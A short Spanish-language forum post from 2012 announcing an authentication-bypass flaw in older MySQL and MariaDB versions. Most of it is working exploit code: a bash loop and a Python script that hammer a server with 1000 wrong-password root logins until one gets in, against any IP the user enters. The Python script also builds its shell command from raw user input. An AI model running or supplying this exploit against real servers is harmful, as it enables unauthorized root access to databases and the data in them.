Grave Vulnerabilidad MySql (11/6/12)
Publicado: 11 Jun 2012, 12:01
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
En Python:$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>
Código: Seleccionar todo
#!/usr/bin/python
import subprocess
t=0
user = raw_input("DBUser: ")
ip_adress = raw_input("IP: ")
while 1:
print "Solicitando: ", t
subprocess.Popen("mysql -u " +user +" -h "+ip_adress+" --password=blah", shell=True).wait()
if(t> 999):
print "El servidor no es vulnerable!"
break;
t=t+1
Ref:
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]